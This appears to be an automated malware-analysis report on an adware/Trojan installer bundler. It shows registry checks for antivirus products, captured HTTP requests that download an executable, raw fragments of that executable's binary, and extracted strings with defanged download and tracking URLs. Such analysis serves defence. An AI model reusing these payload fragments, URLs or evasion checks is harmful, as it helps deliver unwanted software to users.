,RE3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\W
indows\CurrentVersion\App Paths\amigo.exe..422#D|2A^0,RE3|webssearches
Software\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftwar
e\awesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\s
weet-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi
-viewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\
mystartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\Cur
rentVersion\Uninstall\avast..430#O|X^0*V^0*S^0*E^0*EV1^0*T^0,D|3.5A^0,
B2|I^7TU*F^29TU,WBCS|WebbionBrowserChecks,RV3|Lavasoft\Web Companion^I
nstalled^1..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malw
arebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiCl
ient,RE2|AVG,RE2|Classes\CLSID\{9563BC59-9556-4805-8CD4-886781779D8D},
RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Unin
stall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malwar
e,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|A
VG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\M

<<< skipped >>>

GET /DigiAqua_7598.exe HTTP/1.1
User-Agent: toys::file
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1448307590"
Last-Modified: Mon, 23 Nov 2015 19:39:50 GMT
Cache-Control: max-age=86399
Content-Length: 232450
Content-Type: application/octet-stream
X-HW: 1448341064.dop014.fr7.t,1448341064.cds029.fr7.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
..................4..............................................t....
....4..?..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]..../.. ...........................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /download.php?ln6GeA== HTTP/1.1
User-Agent: toys::file
Host: VVV.comar13west.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Tue, 24 Nov 2015 04:57:42 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Content-Disposition: attachment; filename="InstallMonetizer.exe"
Location: hXXp://secured.cdnpmmm.us/DigiAqua_7598.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET /DigiAqua_7598.exe HTTP/1.1
User-Agent: toys::file
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:43 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1448307590"
Last-Modified: Mon, 23 Nov 2015 19:39:50 GMT
Cache-Control: max-age=86400
Content-Length: 232450
Content-Type: application/octet-stream
X-HW: 1448341063.dop011.fr7.t,1448341063.cds029.fr7.p
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
..................4..............................................t....
....4..?..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]..../.. ...........................rsrc.
[email protected]..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.....

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_188:

.text
`.rdata
@.data
.rsrc
SSSh88E
SSSh(8E
SSSSh0u
PSSh RE
__MSVCRT_HEAP_SELECT
user32.dll
COMCTL32.dll
VERSION.dll
GetWindowsDirectoryA
KERNEL32.dll
CreateDialogIndirectParamA
MsgWaitForMultipleObjects
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
LZ32.dll
RPCRT4.dll
GetCPInfo
EnumChildWindows
SetViewportExtEx
SetViewportOrgEx
Folder=%s
File=%s
explorer.exe
ErrorInformation=%s
setup.log
GetSystemWindowsDirectoryA
KERNEL32.DLL
EXE=%s
ISSetup.dll
_Setup2k.dll
_Setup7.dll
setup.isn
_Setup.dll
C:\CodeBases\isdev\src\Runtime\InstallScript\SetupNew\setup.cpp
setup.exe
hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
data1.hdr
=Result=%s
HeaderPathFile=%s
User=%s
Password=%s
ProxyUser=%s
ProxyPassword=%s
Result=%s
-sel_langx
setup.inx
layout.bin
SourceFile=%s
TargetFile=%s
data1.cab
.?AVhttp_file@is@@
d.d %s%s
%s %ld %s
%ld %s
.DEFAULT\Control Panel\International
.Default\Control Panel\desktop\ResourceLocale
Kernel32.dll
kernel32.dll
Ntdll.dll
psapi.dll
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
SOFTWARE\Microsoft\Windows\CurrentVersion
%s|%s|
%s%s%s
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
%d.%d
%d.%d.%d.%d
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
source%d
dest%d
InstallShieldPendingOperation
MPR.DLL
.rdata
.debug
zcÁ
uxtheme.dll
%hx.rra
skin.ini
-x
%d,%d,%d
%d,%d
c:\%original file name%.exe
!"#$%&'()* ,
version="1.0.0.0"
name="InstallShield.Setup"
<description>InstallShield.Setup</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
PAPP:%s
PVENDOR:%s
PGUID:%s
>%s (%d)
123.tmp
hXXp://
%ld : 0x%x
%*.*f
lISSetup.dll
setup.ini
pinstallfromweb:
key%d
cmdline
ErrorReportURL
CompanyURL
PasswordDialog
hXXps://
<Support>\Engine\Log
<Support>
SUPPORTDIR
SHOW_PASSWORD_DIALOG
PTF://
setup.gif
setup.bmp
setupdir\x
%d%s%d%s%d%s%d
Windows XP
Windows Server2003
Windows Vista
Windows 2000
Windows 95
Windows 98
Windows Me
Windows NT 4.0
EXPLORER.EXE
PSTORES.EXE
%s%s%d.%s
Setup.exe
14.0.162

%original file name%.exe_188_rwx_003C0000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_188_rwx_00A41000_00137000:

t.OOt
SSSSh0u
SSSSh
u#SSSSh
SSSSh$O
WSSh|Z
WSShlZ
SSSh Z
SSShlZ
PSSht
PSShd
PSSh\
PSShT
^}•x
AUTPRX32.DLL
__MSVCRT_HEAP_SELECT
user32.dll
GetWindowsDirectoryA
WinExec
KERNEL32.dll
ExitWindowsEx
CreateDialogIndirectParamA
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegEnumKeyExA
RegDeleteKeyA
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll
GetCPInfo
MsgWaitForMultipleObjects
SetViewportExtEx
SetViewportOrgEx
CStdStubBuffer_IsIIDSupported
ISSetup.dll
C:\CodeBases\isdev\src\Shared\LogServices2\ComVariantEx2.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\FeatureLog.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\LogDB.cpp
sC:\CodeBases\isdev\src\Shared\LogServices2\LogServices.cpp
_hk%d
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypes.cpp
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypeClsFactory.h
C:\CodeBases\isdev\src\Shared\LogServices2\OpTypeTuple.cpp
Result=%s
%s=%s
C:\CodeBases\isdev\src\Shared\LogServices2\persist.h
ID_%d
oC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\CABFile.cpp
setup.ini
xj%s\%s
%s %s:%s
AE7D33AA-6C76-4FC5-A151-633472AD6A94
layout.bin
Data1.cab
Data1.hdr
QC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Component.cpp
%d.%d.%d.%d
%d.%d
UnresolvedTarget=%s
ResolvedTarget=%s
Feature=%s
Target=%s
Source=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TargetFile.h
'`.exe
File=%s
OverwriteDetails=%s
wC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\DriverWrapper.cpp
\AppHelp.dll
ISBEW64.exe
Component=%s
RegExe=%s
RegCmdLine=%s
DotNetInstaller.exe
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileGroup.cpp
OSFlavors4SingleOperation=0xlx
GetSystemWindowsDirectoryA
KERNEL32.DLL
%hx.rra
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileRegistrar.cpp
aSResult=%s
oleaut32.dll
RegisterFile%d
SOFTWARE\Microsoft\Windows\CurrentVersion
ZBC:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\FileService.cpp
ShowPasswordDialog
CmdLine
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\IScriptWrapper.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\KernelMedia.cpp
setup.inx
_Setup.dll
data2.cab
data1.cab
data1.hdr
setup.exe
CF3DC1C0-3C9A-11D3-88ED-00C04F72F303
MediaFile=%s
User=%s
Password=%s
ProxyUser=%s
ProxyPassword=%s
SetupLauncherName=%s
TempDisk1Folder=%s
<Support>Script
PUBLICKEY
Name=Name=%s
Name=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectHolder.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectWrapper.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\PropertyBag.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Reboot.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Registry.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\RegistrySet.cpp
RootKey=0xlx
Key=%s
Data=%s
CreateKeyEnd
CreateKeyBegin
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ServiceProvider.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\SetupType.cpp
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\SharedFiles.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\Shell.cpp
ISShellObjOp
Folder=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ShellLink.cpp
FType=%s
ProgramFolder=%s
ItemName=%s
CommandLine= %s
WorkingDir=%s
IconFile=%s
ShortcutKey=%s
Hotkey
Type=%s
PendingFileRenameOperations
WININIT.INI
Value=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TextSubstitution.cpp
TextSub=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\TransferEventsListener.cpp
agent.exe
Library=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\ErrorObj.cpp
Type=%S
Description=%S
Source=%S
HelpFile=%S
ISRT.dll
(string)%s
(stringw)%S
Function=%s
ReturnType=%s
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptDebug.cpp
InstallShield.SetupScriptDebugger.14
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptEngine.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\iScript\IScriptImpl.cpp
ExportedFuncEnd
ExportedFuncBegin
Method=%s
hC:\CodeBases\isdev\src\Runtime\InstallScript\iScript\struct.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\User\BillBoads.cpp
DH%s\bbrd%d.bmp
%s\bbrd%d.wmf
C:\CodeBases\isdev\src\Runtime\InstallScript\User\MainWindow.cpp
C:\CodeBases\isdev\src\Runtime\InstallScript\User\UserInterface.cpp
%d,%d,%d
%d,%d
d.d %s%s
%s %ld %s
%ld %s
.rdata
.debug
BetaMarker.dat
EvalMarker.dat
InstallShield.SetupKernel.14
InstallShield.SetupKernel
InstallShield.SetupLogServices.14
InstallShield.SetupLogServices
InstallShield.SetupScriptDriverWrapper.14
InstallShield.SetupScriptDriverWrapper
C:\CodeBases\isdev\src\Runtime\InstallScript\Kernel\ObjectWrapper.h
>%s (%d)
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
%s|%s|
.?AVhttp_file@is@@
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
.text
source%d
dest%d
Software\InstallShieldPendingOperation
WinTrust.dll
CertFreeCertificateChain
CertGetCertificateChain
CertAddCertificateContextToStore
CertFindCertificateInStore
CertCloseStore
CertNameToStrA
CertOpenSystemStoreA
CertSaveStore
CertOpenStore
CertGetIssuerCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertFreeCertificateContext
CryptImportPublicKeyInfo
CertCompareCertificate
CryptMsgClose
CryptMsgGetParam
Crypt32.dll
CryptDestroyKey
CryptExportKey
CryptImportKey
CryptDeriveKey
Advapi32.dll
%s%s%s
zcÁ
0*%UP
q.ya!
%u X`i@
_$,ZS.db
o7.6.3
c:\%original file name%.exe
OPERATION
*.hdr
DISK1SETUPEXENAME
corecomp.ini
SUPPORTDIR
p{92D2CF18-2F36-11d3-A901-00105A088FAC}
portuguese-brazil
portuguese
Software\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield Uninstall Information\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
UNINSTALLKEY
UninstallKey
hXXp://
<Support>
hXXps://
PTF://
eSHAREDSUPPORTDIR
123.tmp
r\ilog.dll
installfromweb:
1234567890
dBenderC.Cab
Software\Microsoft\Windows\CurrentVersion
reboot.ini
*.lnk
explorer.exe
HotKeyCode=
xvalue.shl
*.ips
*%.4lx*.ips
%*.*f
IWININIT.INI
_isuser.dll
_isres.dll
<WINDIR>\Microsoft.NET\Framework\v3.0
<WINDIR>\Microsoft.NET\Framework\v2.0.50727
<WINDIR>\Microsoft.NET\Framework\v1.1.4322
<WINDIR>\Microsoft.NET\Framework\v1.0.3705
InstallShield\UpdateService\agent.exe
dispatch_execption
%s%s%d.%s
6.0.100.1228
1-800-809-5659
InstallShield Runtime Installer<An operation was attempted without opening the Log database.

%original file name%.exe_188_rwx_00B98000_00014000:

?* -,-30
>MN92>a.kS.
.%8%8%8%
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0
0.0.0.0.0
3h%UH

%original file name%.exe_188_rwx_00BCF000_00001000:

kernel32.dll
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll

%original file name%.exe_188_rwx_018D1000_00080000:

SSSSh0u
uwSSh
PSShx@
PSShh@
PSSh`B
PSShXB
.tTPV
FTPjK
FtPj;
F.PjRWj
u.hPX
u.WWj
u.VVj
__MSVCRT_HEAP_SELECT
portuguese-brazilian
user32.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
EnumChildWindows
CreateDialogIndirectParamA
USER32.dll
GDI32.dll
EnumPortsA
WINSPOOL.DRV
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
RPCRT4.dll
VERSION.dll
GetCPInfo
MsgWaitForMultipleObjects
SetViewportExtEx
SetViewportOrgEx
RegCloseKey
RegOpenKeyA
RegOpenKeyExA
ADVAPI32.dll
ISRT.dll
Result=%s
RegistrySet=%s
Media=%s
)Result=%s
Name=%s
%s\%s
GetSystemWindowsDirectoryA
KERNEL32.DLL
%hx.rra
Dll=%s
Function=%s
Param01=%s
Dir=%s
Source=%s
Target=%s
InstallFromTheWeb
Library=%s
RICHED32.DLL
uxtheme.dll
File=%s
ProgId=%s
AssemblyPathFile=%s
AssemblyNameAndClass=%s
AppDomain=%s
mscoree.dll
PrintFileWithShellExecute
ShellExecute failed.
An unhandled exception occurred in 'CPrintRuntime::%s'.
ShellExecute returned:
RootKey=%ld
Key=%s
Class=%s
RegDBCreateKeyEx
RegDBDeleteKey
Value=%s
ValueName=%s
RegDBSetKeyValueEx
%d,%d,%d
%d,%d
ProgramFolder=%s
ItemName=%s
CommandLine= %s
WorkingDir=%s
IconFile=%s
ShortcutKey=%s
Folder=%s
Icon=%s
NewItemName=%s
CommandLine=%s
IconPath=%s
view.bmp
FileName=%s
FileVersion=%s
%d.%d.%d.%d
4194303.9
4194303
%s%s%s
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExe: %s
SOFTWARE\Microsoft\Windows\CurrentVersion
%s|%s|
InternetCanonicalizeUrlA
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestA
HttpOpenRequestA
FtpFindFirstFileA
HttpQueryInfoA
InternetCreateUrlA
InternetCrackUrlA
InternetOpenUrlA
wininet.dll
RPAWINET.DLL
Mozilla
AutoConfigURL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
\mozver.dat
netscp6.exe
netscape.exe
FTP_ProxyPort
FTP_Proxy
HTTPS_ProxyPort
HTTPS_Proxy
https=
HTTP_ProxyPort
HTTP_Proxy
http=
\prefs.js
\nsreg.dat
\registry.dat
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
"network.proxy.autoconfig_url"
"network.proxy.no_proxies_on"
"network.proxy.ftp_port"
"network.proxy.ftp"
"network.proxy.ssl_port"
"network.proxy.ssl"
"network.proxy.http_port"
"network.proxy.http"
network.proxy.type
Range: bytes=%d-
.?AVhttp_file@is@@
MPR.DLL
Kernel32.dll
kernel32.dll
Ntdll.dll
psapi.dll
skin.ini
-x
zcÁ
c:\%original file name%.exe
a.hdr
hXXp://
123.tmp
hXXps://
PTF://
difxapi.dll
1234567890
_isuser.dll
_isres.dll
<Support>
_ISRes.dll
_ISUser.dll
%s%s%d.%s
@%*.*f
EXPLORER.EXE
PSTORES.EXE
>MN92>a.kS.
42%,,2%>

setup.exe_880:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\nsCBHTML5.dll
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\nsCBHTML5.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp
tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,DBNI|OtherthanIEDefault,RE2|Opera Software,RE3|Opera Software
VAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira
Nullsoft Install System v11-Jul-2014.cvs
GetProcessHeap
OLEAUT32.dll
WININET.dll
MSVCRT.dll
nsWeb.dll
6(7.767;7
4<.Pd
q.ya!
%u X`i@
_$,ZS.db
o7.6.3
0*%UP
nsy2.tmp
2.html?
://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
2~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1905696
ments and Settings\"%CurrentUserName%"\Local Settings\Temp\setup.exe"
{E1070104-F404-44CE-B556-0622F9D63EE5}
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
ft Windows XP
"%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe"
%Documents and Settings%\%current user%\Local Settings\Temp
setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe
1048838
940180580
1179874
1376514
1048880
1245524
1179950
37.57.16.189_2015-11-23_23:57:47
422~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1245444
-1945828744
hXXp://VVV.fcesneim.us/FCL_htiw_qinu.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php
\Program Files\Internet Explorer\iexplore.exe" -nohome
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip
hXXp://VVV.djapp.info/?file=bundle
hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip
B1|C*F*I,F4|Mail.Ru\Sputnik
KLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,DBNI|OtherthanIEDefault,RE2|Opera Software,RE3|Opera Software
689#B1|C*F*I,F4|Mail.Ru\Sputnik
ST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira
Mail.Ru\Sputnik
F4|Mail.Ru\Sputnik
ft\Windows\CurrentVersion\Uninstall^Opera
6.189_2015-11-23_23:57:47
ffiliateId.php
mote_dcmd.php
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\FirstResult.txt
89#B1|C*F*I,F4|Mail.Ru\Sputnik
tp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip
17970.exe
w.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01
systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
re,RE3|Opera Software
cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
hXXp://VVV.microsoft.com

%original file name%.exe_188_rwx_01955000_00001000:

kernel32.dll
USER32.dll
GDI32.dll
WINSPOOL.DRV
EnumPortsA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
VERSION.dll
ADVAPI32.dll

%original file name%.exe_188_rwx_01970000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_188_rwx_01B31000_00075000:

Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
__MSVCRT_HEAP_SELECT
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
portuguese-brazilian
c:\%original file name%.exe
GetCPInfo
KERNEL32.dll
11111118
222222222
7777@@@@
2222222
222222222222
22222222222
2222222222
''''~~~~
777@7@@@
--$$#!!!!
7777777
111118111
22222222
FFFrCrTrTTTTTTTTTTTTTTTTTrTrTrrrrrrrFrrbFbbbFbbbbbbbbbbbbbbbbbooooooooooooooooo
!!##$$$$#
.....zzbF
...zzbFF)
0000000
11111111
1111111
|||:||||
